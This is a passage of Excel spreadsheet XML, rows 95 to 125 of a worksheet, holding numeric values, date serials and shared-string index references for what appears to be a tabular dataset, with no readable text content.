      <c r="G95" s="10">
        <v>39686.615277777775</v>
      </c>
      <c r="H95" s="9">
        <v>35</v>
      </c>
      <c r="I95" s="9" t="s">
        <v>1668</v>
      </c>
      <c r="J95" s="10">
        <v>39686.613194444442</v>
      </c>
      <c r="K95" s="9" t="s">
        <v>932</v>
      </c>
      <c r="L95" s="7">
        <v>4</v>
      </c>
      <c r="M95" s="7">
        <v>2</v>
      </c>
      <c r="N95" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="96" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A96" s="3">
        <v>28421</v>
      </c>
      <c r="B96" s="3" t="s">
        <v>406</v>
      </c>
      <c r="C96" s="9" t="s">
        <v>1916</v>
      </c>
      <c r="D96" s="9" t="s">
        <v>1917</v>
      </c>
      <c r="E96" s="9">
        <v>2314</v>
      </c>
      <c r="F96" s="9" t="s">
        <v>1918</v>
      </c>
      <c r="G96" s="10">
        <v>42339.834027777775</v>
      </c>
      <c r="H96" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I96" s="9" t="s">
        <v>1919</v>
      </c>
      <c r="J96" s="10">
        <v>42339.688194444447</v>
      </c>
      <c r="K96" s="3" t="s">
        <v>407</v>
      </c>
      <c r="L96" s="4">
        <v>5</v>
      </c>
      <c r="M96" s="4">
        <v>3</v>
      </c>
      <c r="N96" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O96" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P96" s="3"/>
      <c r="Q96" s="3"/>
    </row>
    <row r="97" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A97" s="3">
        <v>28811</v>
      </c>
      <c r="B97" s="3" t="s">
        <v>436</v>
      </c>
      <c r="C97" s="9" t="s">
        <v>1920</v>
      </c>
      <c r="D97" s="9" t="s">
        <v>1921</v>
      </c>
      <c r="E97" s="9">
        <v>3055</v>
      </c>
      <c r="F97" s="9" t="s">
        <v>1922</v>
      </c>
      <c r="G97" s="10">
        <v>40096.573611111111</v>
      </c>
      <c r="H97" s="9">
        <v>63550</v>
      </c>
      <c r="I97" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J97" s="10">
        <v>40083.804166666669</v>
      </c>
      <c r="K97" s="3" t="s">
        <v>437</v>
      </c>
      <c r="L97" s="4">
        <v>7</v>
      </c>
      <c r="M97" s="4">
        <v>3</v>
      </c>
      <c r="N97" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O97" s="3" t="s">
        <v>705</v>
      </c>
      <c r="P97" s="3"/>
      <c r="Q97" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="98" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A98" s="3">
        <v>28937</v>
      </c>
      <c r="B98" s="3" t="s">
        <v>438</v>
      </c>
      <c r="C98" s="9" t="s">
        <v>1923</v>
      </c>
      <c r="D98" s="9" t="s">
        <v>1924</v>
      </c>
      <c r="E98" s="9">
        <v>999</v>
      </c>
      <c r="F98" s="9" t="s">
        <v>1817</v>
      </c>
      <c r="G98" s="10">
        <v>41012.424305555556</v>
      </c>
      <c r="H98" s="9">
        <v>1219121</v>
      </c>
      <c r="I98" s="9" t="s">
        <v>1818</v>
      </c>
      <c r="J98" s="10">
        <v>40998.270833333336</v>
      </c>
      <c r="K98" s="3" t="s">
        <v>439</v>
      </c>
      <c r="L98" s="4">
        <v>4</v>
      </c>
      <c r="M98" s="4">
        <v>2</v>
      </c>
      <c r="N98" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O98" s="3"/>
      <c r="P98" s="3"/>
      <c r="Q98" s="3"/>
    </row>
    <row r="99" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A99" s="3">
        <v>29124</v>
      </c>
      <c r="B99" s="3" t="s">
        <v>440</v>
      </c>
      <c r="C99" s="9" t="s">
        <v>1925</v>
      </c>
      <c r="D99" s="9" t="s">
        <v>1926</v>
      </c>
      <c r="E99" s="9">
        <v>8701</v>
      </c>
      <c r="F99" s="9" t="s">
        <v>1927</v>
      </c>
      <c r="G99" s="10">
        <v>39926.813194444447</v>
      </c>
      <c r="H99" s="9">
        <v>8701</v>
      </c>
      <c r="I99" s="9" t="s">
        <v>1927</v>
      </c>
      <c r="J99" s="10">
        <v>39926.811111111114</v>
      </c>
      <c r="K99" s="3" t="s">
        <v>441</v>
      </c>
      <c r="L99" s="4">
        <v>6</v>
      </c>
      <c r="M99" s="4">
        <v>3</v>
      </c>
      <c r="N99" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O99" s="3" t="s">
        <v>696</v>
      </c>
      <c r="P99" s="3"/>
      <c r="Q99" s="3"/>
    </row>
    <row r="100" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A100" s="3">
        <v>29130</v>
      </c>
      <c r="B100" s="3" t="s">
        <v>442</v>
      </c>
      <c r="C100" s="9" t="s">
        <v>1928</v>
      </c>
      <c r="D100" s="9" t="s">
        <v>1929</v>
      </c>
      <c r="E100" s="9">
        <v>1</v>
      </c>
      <c r="F100" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="G100" s="10">
        <v>39687.386111111111</v>
      </c>
      <c r="H100" s="9">
        <v>1</v>
      </c>
      <c r="I100" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="J100" s="10">
        <v>39687.386111111111</v>
      </c>
      <c r="K100" s="3" t="s">
        <v>443</v>
      </c>
      <c r="L100" s="4">
        <v>5</v>
      </c>
      <c r="M100" s="4">
        <v>3</v>
      </c>
      <c r="N100" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O100" s="3"/>
      <c r="P100" s="3"/>
      <c r="Q100" s="3"/>
    </row>
    <row r="101" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A101" s="3">
        <v>29248</v>
      </c>
      <c r="B101" s="3" t="s">
        <v>444</v>
      </c>
      <c r="C101" s="9" t="s">
        <v>1930</v>
      </c>
      <c r="D101" s="9" t="s">
        <v>1931</v>
      </c>
      <c r="E101" s="9">
        <v>1143</v>
      </c>
      <c r="F101" s="9" t="s">
        <v>1932</v>
      </c>
      <c r="G101" s="10">
        <v>39807.831250000003</v>
      </c>
      <c r="H101" s="9">
        <v>2134</v>
      </c>
      <c r="I101" s="9" t="s">
        <v>1710</v>
      </c>
      <c r="J101" s="10">
        <v>39796.22152777778</v>
      </c>
      <c r="K101" s="3" t="s">
        <v>445</v>
      </c>
      <c r="L101" s="4">
        <v>3</v>
      </c>
      <c r="M101" s="4">
        <v>1</v>
      </c>
      <c r="N101" s="3" t="s">
        <v>708</v>
      </c>
      <c r="O101" s="3"/>
      <c r="P101" s="3"/>
      <c r="Q101" s="3"/>
    </row>
    <row r="102" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A102" s="9">
        <v>29511</v>
      </c>
      <c r="B102" s="9" t="s">
        <v>933</v>
      </c>
      <c r="C102" s="9" t="s">
        <v>1933</v>
      </c>
      <c r="D102" s="9" t="s">
        <v>1934</v>
      </c>
      <c r="E102" s="9">
        <v>422</v>
      </c>
      <c r="F102" s="9" t="s">
        <v>1935</v>
      </c>
      <c r="G102" s="10">
        <v>39687.193749999999</v>
      </c>
      <c r="H102" s="9">
        <v>1220</v>
      </c>
      <c r="I102" s="9" t="s">
        <v>1936</v>
      </c>
      <c r="J102" s="10">
        <v>39687.186111111114</v>
      </c>
      <c r="K102" s="9" t="s">
        <v>934</v>
      </c>
      <c r="L102" s="7">
        <v>3</v>
      </c>
      <c r="M102" s="7">
        <v>1</v>
      </c>
      <c r="N102" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="103" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A103" s="9">
        <v>29743</v>
      </c>
      <c r="B103" s="9" t="s">
        <v>935</v>
      </c>
      <c r="C103" s="9" t="s">
        <v>1937</v>
      </c>
      <c r="D103" s="9" t="s">
        <v>1938</v>
      </c>
      <c r="E103" s="9">
        <v>64046</v>
      </c>
      <c r="F103" s="9" t="s">
        <v>1939</v>
      </c>
      <c r="G103" s="10">
        <v>42123.699305555558</v>
      </c>
      <c r="H103" s="9">
        <v>477563</v>
      </c>
      <c r="I103" s="9" t="s">
        <v>1940</v>
      </c>
      <c r="J103" s="10">
        <v>42123.663888888892</v>
      </c>
      <c r="K103" s="9" t="s">
        <v>936</v>
      </c>
      <c r="L103" s="7">
        <v>7</v>
      </c>
      <c r="M103" s="7">
        <v>4</v>
      </c>
      <c r="N103" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="104" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A104" s="3">
        <v>30197</v>
      </c>
      <c r="B104" s="3" t="s">
        <v>464</v>
      </c>
      <c r="C104" s="9" t="s">
        <v>1941</v>
      </c>
      <c r="D104" s="9" t="s">
        <v>1942</v>
      </c>
      <c r="E104" s="9">
        <v>2541</v>
      </c>
      <c r="F104" s="9" t="s">
        <v>1943</v>
      </c>
      <c r="G104" s="10">
        <v>41723.512499999997</v>
      </c>
      <c r="H104" s="9">
        <v>2385565</v>
      </c>
      <c r="I104" s="9" t="s">
        <v>1944</v>
      </c>
      <c r="J104" s="10">
        <v>41723.325694444444</v>
      </c>
      <c r="K104" s="3" t="s">
        <v>465</v>
      </c>
      <c r="L104" s="4">
        <v>7</v>
      </c>
      <c r="M104" s="4">
        <v>5</v>
      </c>
      <c r="N104" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O104" s="3"/>
      <c r="P104" s="3"/>
      <c r="Q104" s="3"/>
    </row>
    <row r="105" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A105" s="3">
        <v>31056</v>
      </c>
      <c r="B105" s="3" t="s">
        <v>466</v>
      </c>
      <c r="C105" s="9" t="s">
        <v>1945</v>
      </c>
      <c r="D105" s="9" t="s">
        <v>1946</v>
      </c>
      <c r="E105" s="9">
        <v>3055</v>
      </c>
      <c r="F105" s="9" t="s">
        <v>1922</v>
      </c>
      <c r="G105" s="10">
        <v>41316.275694444441</v>
      </c>
      <c r="H105" s="9">
        <v>149265</v>
      </c>
      <c r="I105" s="9" t="s">
        <v>1947</v>
      </c>
      <c r="J105" s="10">
        <v>41314.533333333333</v>
      </c>
      <c r="K105" s="3" t="s">
        <v>467</v>
      </c>
      <c r="L105" s="4">
        <v>7</v>
      </c>
      <c r="M105" s="4">
        <v>5</v>
      </c>
      <c r="N105" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O105" s="3"/>
      <c r="P105" s="3"/>
      <c r="Q105" s="3"/>
    </row>
    <row r="106" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A106" s="3">
        <v>31860</v>
      </c>
      <c r="B106" s="3" t="s">
        <v>468</v>
      </c>
      <c r="C106" s="9" t="s">
        <v>1948</v>
      </c>
      <c r="D106" s="9" t="s">
        <v>1949</v>
      </c>
      <c r="E106" s="9">
        <v>6083675</v>
      </c>
      <c r="F106" s="9" t="s">
        <v>1950</v>
      </c>
      <c r="G106" s="10">
        <v>42559.686805555553</v>
      </c>
      <c r="H106" s="9">
        <v>3043</v>
      </c>
      <c r="I106" s="9" t="s">
        <v>813</v>
      </c>
      <c r="J106" s="10">
        <v>39720.722916666666</v>
      </c>
      <c r="K106" s="3" t="s">
        <v>469</v>
      </c>
      <c r="L106" s="4">
        <v>7</v>
      </c>
      <c r="M106" s="4">
        <v>5</v>
      </c>
      <c r="N106" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O106" s="3"/>
      <c r="P106" s="3"/>
      <c r="Q106" s="3"/>
    </row>
    <row r="107" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A107" s="3">
        <v>32336</v>
      </c>
      <c r="B107" s="3" t="s">
        <v>470</v>
      </c>
      <c r="C107" s="9" t="s">
        <v>1951</v>
      </c>
      <c r="D107" s="9" t="s">
        <v>1952</v>
      </c>
      <c r="E107" s="9">
        <v>3191</v>
      </c>
      <c r="F107" s="9" t="s">
        <v>1953</v>
      </c>
      <c r="G107" s="10">
        <v>41176.620833333334</v>
      </c>
      <c r="H107" s="9">
        <v>52360</v>
      </c>
      <c r="I107" s="9" t="s">
        <v>1954</v>
      </c>
      <c r="J107" s="10">
        <v>41176.116666666669</v>
      </c>
      <c r="K107" s="3" t="s">
        <v>471</v>
      </c>
      <c r="L107" s="4">
        <v>9</v>
      </c>
      <c r="M107" s="4">
        <v>7</v>
      </c>
      <c r="N107" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O107" s="3"/>
      <c r="P107" s="3"/>
      <c r="Q107" s="3"/>
    </row>
    <row r="108" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A108" s="3">
        <v>32386</v>
      </c>
      <c r="B108" s="3" t="s">
        <v>532</v>
      </c>
      <c r="C108" s="9" t="s">
        <v>1955</v>
      </c>
      <c r="D108" s="9" t="s">
        <v>1956</v>
      </c>
      <c r="E108" s="9">
        <v>2114</v>
      </c>
      <c r="F108" s="9" t="s">
        <v>1957</v>
      </c>
      <c r="G108" s="10">
        <v>39688.606249999997</v>
      </c>
      <c r="H108" s="9">
        <v>2114</v>
      </c>
      <c r="I108" s="9" t="s">
        <v>1957</v>
      </c>
      <c r="J108" s="10">
        <v>39688.604861111111</v>
      </c>
      <c r="K108" s="3" t="s">
        <v>533</v>
      </c>
      <c r="L108" s="4">
        <v>3</v>
      </c>
      <c r="M108" s="4">
        <v>1</v>
      </c>
      <c r="N108" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O108" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P108" s="3"/>
      <c r="Q108" s="3"/>
    </row>
    <row r="109" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A109" s="9">
        <v>32747</v>
      </c>
      <c r="B109" s="9" t="s">
        <v>937</v>
      </c>
      <c r="C109" s="9" t="s">
        <v>1958</v>
      </c>
      <c r="D109" s="9" t="s">
        <v>1959</v>
      </c>
      <c r="E109" s="9">
        <v>1402846</v>
      </c>
      <c r="F109" s="9" t="s">
        <v>1794</v>
      </c>
      <c r="G109" s="10">
        <v>42470.300694444442</v>
      </c>
      <c r="H109" s="9">
        <v>7304137</v>
      </c>
      <c r="I109" s="9" t="s">
        <v>1960</v>
      </c>
      <c r="J109" s="10">
        <v>42470.290277777778</v>
      </c>
      <c r="K109" s="9" t="s">
        <v>938</v>
      </c>
      <c r="L109" s="7">
        <v>9</v>
      </c>
      <c r="M109" s="7">
        <v>7</v>
      </c>
      <c r="N109" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="110" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A110" s="3">
        <v>33516</v>
      </c>
      <c r="B110" s="3" t="s">
        <v>534</v>
      </c>
      <c r="C110" s="9" t="s">
        <v>1961</v>
      </c>
      <c r="D110" s="9" t="s">
        <v>1962</v>
      </c>
      <c r="E110" s="9">
        <v>3474</v>
      </c>
      <c r="F110" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="G110" s="10">
        <v>42524.227777777778</v>
      </c>
      <c r="H110" s="9">
        <v>59087</v>
      </c>
      <c r="I110" s="9" t="s">
        <v>1737</v>
      </c>
      <c r="J110" s="10">
        <v>42524.117361111108</v>
      </c>
      <c r="K110" s="3" t="s">
        <v>535</v>
      </c>
      <c r="L110" s="4">
        <v>3</v>
      </c>
      <c r="M110" s="4">
        <v>1</v>
      </c>
      <c r="N110" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O110" s="3"/>
      <c r="P110" s="3"/>
      <c r="Q110" s="3"/>
    </row>
    <row r="111" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A111" s="3">
        <v>33528</v>
      </c>
      <c r="B111" s="3" t="s">
        <v>536</v>
      </c>
      <c r="C111" s="9" t="s">
        <v>1964</v>
      </c>
      <c r="D111" s="9" t="s">
        <v>1965</v>
      </c>
      <c r="E111" s="9">
        <v>327</v>
      </c>
      <c r="F111" s="9" t="s">
        <v>1966</v>
      </c>
      <c r="G111" s="10">
        <v>39688.9375</v>
      </c>
      <c r="H111" s="9">
        <v>327</v>
      </c>
      <c r="I111" s="9" t="s">
        <v>1966</v>
      </c>
      <c r="J111" s="10">
        <v>39688.935416666667</v>
      </c>
      <c r="K111" s="3" t="s">
        <v>537</v>
      </c>
      <c r="L111" s="4">
        <v>4</v>
      </c>
      <c r="M111" s="4">
        <v>2</v>
      </c>
      <c r="N111" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O111" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P111" s="3"/>
      <c r="Q111" s="3"/>
    </row>
    <row r="112" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A112" s="9">
        <v>33923</v>
      </c>
      <c r="B112" s="9" t="s">
        <v>939</v>
      </c>
      <c r="C112" s="9" t="s">
        <v>1967</v>
      </c>
      <c r="D112" s="9" t="s">
        <v>1968</v>
      </c>
      <c r="E112" s="9">
        <v>1432051</v>
      </c>
      <c r="F112" s="9" t="s">
        <v>1969</v>
      </c>
      <c r="G112" s="10">
        <v>42654.104166666664</v>
      </c>
      <c r="H112" s="9">
        <v>5768335</v>
      </c>
      <c r="I112" s="9" t="s">
        <v>1970</v>
      </c>
      <c r="J112" s="10">
        <v>42653.70208333333</v>
      </c>
      <c r="K112" s="9" t="s">
        <v>940</v>
      </c>
      <c r="L112" s="7">
        <v>9</v>
      </c>
      <c r="M112" s="7">
        <v>7</v>
      </c>
      <c r="N112" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="113" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A113" s="9">
        <v>34988</v>
      </c>
      <c r="B113" s="9" t="s">
        <v>941</v>
      </c>
      <c r="C113" s="9" t="s">
        <v>1971</v>
      </c>
      <c r="D113" s="9" t="s">
        <v>1972</v>
      </c>
      <c r="E113" s="9">
        <v>1782</v>
      </c>
      <c r="F113" s="9" t="s">
        <v>1973</v>
      </c>
      <c r="G113" s="10">
        <v>39694.745138888888</v>
      </c>
      <c r="H113" s="9">
        <v>308</v>
      </c>
      <c r="I113" s="9" t="s">
        <v>1974</v>
      </c>
      <c r="J113" s="10">
        <v>39694.739583333336</v>
      </c>
      <c r="K113" s="9" t="s">
        <v>942</v>
      </c>
      <c r="L113" s="7">
        <v>6</v>
      </c>
      <c r="M113" s="7">
        <v>4</v>
      </c>
      <c r="Q113" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="114" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A114" s="9">
        <v>35339</v>
      </c>
      <c r="B114" s="9" t="s">
        <v>943</v>
      </c>
      <c r="C114" s="9" t="s">
        <v>1975</v>
      </c>
      <c r="D114" s="9" t="s">
        <v>1976</v>
      </c>
      <c r="E114" s="9">
        <v>2</v>
      </c>
      <c r="F114" s="9" t="s">
        <v>1977</v>
      </c>
      <c r="G114" s="10">
        <v>39689.910416666666</v>
      </c>
      <c r="H114" s="9">
        <v>658</v>
      </c>
      <c r="I114" s="9" t="s">
        <v>1978</v>
      </c>
      <c r="J114" s="10">
        <v>39689.904861111114</v>
      </c>
      <c r="K114" s="9" t="s">
        <v>944</v>
      </c>
      <c r="L114" s="7">
        <v>3</v>
      </c>
      <c r="M114" s="7">
        <v>1</v>
      </c>
      <c r="N114" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="115" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A115" s="3">
        <v>36629</v>
      </c>
      <c r="B115" s="3" t="s">
        <v>538</v>
      </c>
      <c r="C115" s="9" t="s">
        <v>1979</v>
      </c>
      <c r="D115" s="9" t="s">
        <v>1980</v>
      </c>
      <c r="E115" s="9">
        <v>116</v>
      </c>
      <c r="F115" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="G115" s="10">
        <v>39693.306944444441</v>
      </c>
      <c r="H115" s="9">
        <v>116</v>
      </c>
      <c r="I115" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="J115" s="10">
        <v>39691.184027777781</v>
      </c>
      <c r="K115" s="3" t="s">
        <v>539</v>
      </c>
      <c r="L115" s="4">
        <v>2</v>
      </c>
      <c r="M115" s="4">
        <v>1</v>
      </c>
      <c r="N115" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O115" s="3"/>
      <c r="P115" s="3"/>
      <c r="Q115" s="3"/>
    </row>
    <row r="116" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A116" s="3">
        <v>36731</v>
      </c>
      <c r="B116" s="3" t="s">
        <v>540</v>
      </c>
      <c r="C116" s="9" t="s">
        <v>1981</v>
      </c>
      <c r="D116" s="9" t="s">
        <v>1982</v>
      </c>
      <c r="E116" s="9">
        <v>1527</v>
      </c>
      <c r="F116" s="9" t="s">
        <v>1983</v>
      </c>
      <c r="G116" s="10">
        <v>40479.35833333333</v>
      </c>
      <c r="H116" s="9">
        <v>3508</v>
      </c>
      <c r="I116" s="9" t="s">
        <v>1984</v>
      </c>
      <c r="J116" s="10">
        <v>40479.263194444444</v>
      </c>
      <c r="K116" s="3" t="s">
        <v>541</v>
      </c>
      <c r="L116" s="4">
        <v>3</v>
      </c>
      <c r="M116" s="4">
        <v>1</v>
      </c>
      <c r="N116" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O116" s="3"/>
      <c r="P116" s="3"/>
      <c r="Q116" s="3"/>
    </row>
    <row r="117" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A117" s="9">
        <v>37162</v>
      </c>
      <c r="B117" s="9" t="s">
        <v>945</v>
      </c>
      <c r="C117" s="9" t="s">
        <v>1985</v>
      </c>
      <c r="D117" s="9" t="s">
        <v>1986</v>
      </c>
      <c r="E117" s="9">
        <v>3915</v>
      </c>
      <c r="F117" s="9" t="s">
        <v>1987</v>
      </c>
      <c r="G117" s="10">
        <v>42331.977777777778</v>
      </c>
      <c r="H117" s="9">
        <v>3218692</v>
      </c>
      <c r="I117" s="9" t="s">
        <v>1988</v>
      </c>
      <c r="J117" s="10">
        <v>42328.490277777775</v>
      </c>
      <c r="K117" s="9" t="s">
        <v>946</v>
      </c>
      <c r="L117" s="7">
        <v>4</v>
      </c>
      <c r="M117" s="7">
        <v>2</v>
      </c>
      <c r="Q117" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="118" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A118" s="3">
        <v>37290</v>
      </c>
      <c r="B118" s="3" t="s">
        <v>548</v>
      </c>
      <c r="C118" s="9" t="s">
        <v>1989</v>
      </c>
      <c r="D118" s="9" t="s">
        <v>1990</v>
      </c>
      <c r="E118" s="9">
        <v>21539</v>
      </c>
      <c r="F118" s="9" t="s">
        <v>1991</v>
      </c>
      <c r="G118" s="10">
        <v>42349.984027777777</v>
      </c>
      <c r="H118" s="9">
        <v>21539</v>
      </c>
      <c r="I118" s="9" t="s">
        <v>1991</v>
      </c>
      <c r="J118" s="10">
        <v>42349.98333333333</v>
      </c>
      <c r="K118" s="3" t="s">
        <v>549</v>
      </c>
      <c r="L118" s="4">
        <v>3</v>
      </c>
      <c r="M118" s="4">
        <v>1</v>
      </c>
      <c r="N118" s="3"/>
      <c r="O118" s="3"/>
      <c r="P118" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q118" s="3"/>
    </row>
    <row r="119" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A119" s="3">
        <v>37687</v>
      </c>
      <c r="B119" s="3" t="s">
        <v>550</v>
      </c>
      <c r="C119" s="9" t="s">
        <v>1992</v>
      </c>
      <c r="D119" s="9" t="s">
        <v>1993</v>
      </c>
      <c r="E119" s="9">
        <v>2541</v>
      </c>
      <c r="F119" s="9" t="s">
        <v>1943</v>
      </c>
      <c r="G119" s="10">
        <v>41691.411111111112</v>
      </c>
      <c r="H119" s="9">
        <v>1269037</v>
      </c>
      <c r="I119" s="9" t="s">
        <v>1994</v>
      </c>
      <c r="J119" s="10">
        <v>41691.254166666666</v>
      </c>
      <c r="K119" s="3" t="s">
        <v>551</v>
      </c>
      <c r="L119" s="4">
        <v>7</v>
      </c>
      <c r="M119" s="4">
        <v>4</v>
      </c>
      <c r="N119" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O119" s="3"/>
      <c r="P119" s="3"/>
      <c r="Q119" s="3"/>
    </row>
    <row r="120" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A120" s="9">
        <v>38549</v>
      </c>
      <c r="B120" s="9" t="s">
        <v>947</v>
      </c>
      <c r="C120" s="9" t="s">
        <v>1995</v>
      </c>
      <c r="D120" s="9" t="s">
        <v>1996</v>
      </c>
      <c r="E120" s="9">
        <v>73226</v>
      </c>
      <c r="F120" s="9" t="s">
        <v>1997</v>
      </c>
      <c r="G120" s="10">
        <v>43509.340277777781</v>
      </c>
      <c r="H120" s="9">
        <v>636987</v>
      </c>
      <c r="I120" s="9" t="s">
        <v>1998</v>
      </c>
      <c r="J120" s="10">
        <v>43507.657638888886</v>
      </c>
      <c r="K120" s="9" t="s">
        <v>948</v>
      </c>
      <c r="L120" s="7">
        <v>16</v>
      </c>
      <c r="M120" s="7">
        <v>13</v>
      </c>
      <c r="N120" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O120" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="121" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A121" s="3">
        <v>38578</v>
      </c>
      <c r="B121" s="3" t="s">
        <v>552</v>
      </c>
      <c r="C121" s="9" t="s">
        <v>1999</v>
      </c>
      <c r="D121" s="9" t="s">
        <v>2000</v>
      </c>
      <c r="E121" s="9">
        <v>116</v>
      </c>
      <c r="F121" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="G121" s="10">
        <v>40935.725694444445</v>
      </c>
      <c r="H121" s="9">
        <v>18511</v>
      </c>
      <c r="I121" s="9" t="s">
        <v>2001</v>
      </c>
      <c r="J121" s="10">
        <v>40931.671527777777</v>
      </c>
      <c r="K121" s="3" t="s">
        <v>553</v>
      </c>
      <c r="L121" s="4">
        <v>6</v>
      </c>
      <c r="M121" s="4">
        <v>4</v>
      </c>
      <c r="N121" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O121" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P121" s="3" t="s">
        <v>711</v>
      </c>
      <c r="Q121" s="3"/>
    </row>
    <row r="122" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A122" s="3">
        <v>38666</v>
      </c>
      <c r="B122" s="3" t="s">
        <v>586</v>
      </c>
      <c r="C122" s="9" t="s">
        <v>2002</v>
      </c>
      <c r="D122" s="9" t="s">
        <v>2003</v>
      </c>
      <c r="E122" s="9">
        <v>30</v>
      </c>
      <c r="F122" s="9" t="s">
        <v>2004</v>
      </c>
      <c r="G122" s="10">
        <v>42943.709027777775</v>
      </c>
      <c r="H122" s="9">
        <v>5423108</v>
      </c>
      <c r="I122" s="9" t="s">
        <v>2005</v>
      </c>
      <c r="J122" s="10">
        <v>42920.365277777775</v>
      </c>
      <c r="K122" s="3" t="s">
        <v>587</v>
      </c>
      <c r="L122" s="4">
        <v>3</v>
      </c>
      <c r="M122" s="4">
        <v>1</v>
      </c>
      <c r="N122" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O122" s="3"/>
      <c r="P122" s="3"/>
      <c r="Q122" s="3"/>
    </row>
    <row r="123" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A123" s="3">
        <v>38990</v>
      </c>
      <c r="B123" s="3" t="s">
        <v>588</v>
      </c>
      <c r="C123" s="9" t="s">
        <v>2006</v>
      </c>
      <c r="D123" s="9" t="s">
        <v>2007</v>
      </c>
      <c r="E123" s="9">
        <v>674039</v>
      </c>
      <c r="F123" s="9" t="s">
        <v>2008</v>
      </c>
      <c r="G123" s="10">
        <v>43341.720833333333</v>
      </c>
      <c r="H123" s="9">
        <v>674039</v>
      </c>
      <c r="I123" s="9" t="s">
        <v>2008</v>
      </c>
      <c r="J123" s="10">
        <v>43341.71597222222</v>
      </c>
      <c r="K123" s="3" t="s">
        <v>589</v>
      </c>
      <c r="L123" s="4">
        <v>8</v>
      </c>
      <c r="M123" s="4">
        <v>6</v>
      </c>
      <c r="N123" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O123" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P123" s="3"/>
      <c r="Q123" s="3"/>
    </row>
    <row r="124" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A124" s="3">
        <v>39128</v>
      </c>
      <c r="B124" s="3" t="s">
        <v>590</v>
      </c>
      <c r="C124" s="9" t="s">
        <v>2009</v>
      </c>
      <c r="D124" s="9" t="s">
        <v>2010</v>
      </c>
      <c r="E124" s="9">
        <v>2169</v>
      </c>
      <c r="F124" s="9" t="s">
        <v>2011</v>
      </c>
      <c r="G124" s="10">
        <v>39693.554166666669</v>
      </c>
      <c r="H124" s="9">
        <v>2169</v>
      </c>
      <c r="I124" s="9" t="s">
        <v>2011</v>
      </c>
      <c r="J124" s="10">
        <v>39693.553472222222</v>
      </c>
      <c r="K124" s="3" t="s">
        <v>591</v>
      </c>
      <c r="L124" s="4">
        <v>3</v>
      </c>
      <c r="M124" s="4">
        <v>1</v>
      </c>
      <c r="N124" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O124" s="3"/>
      <c r="P124" s="3"/>
      <c r="Q124" s="3"/>
    </row>
    <row r="125" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A125" s="3">
        <v>39858</v>
      </c>
      <c r="B125" s="3" t="s">
        <v>592</v>
      </c>
      <c r="C125" s="9" t="s">
        <v>2012</v>
      </c>
      <c r="D125" s="9" t="s">
        <v>2013</v>
      </c>
      <c r="E125" s="9">
        <v>3207</v>
      </c>
      <c r="F125" s="9" t="s">
        <v>2014</v>
      </c>
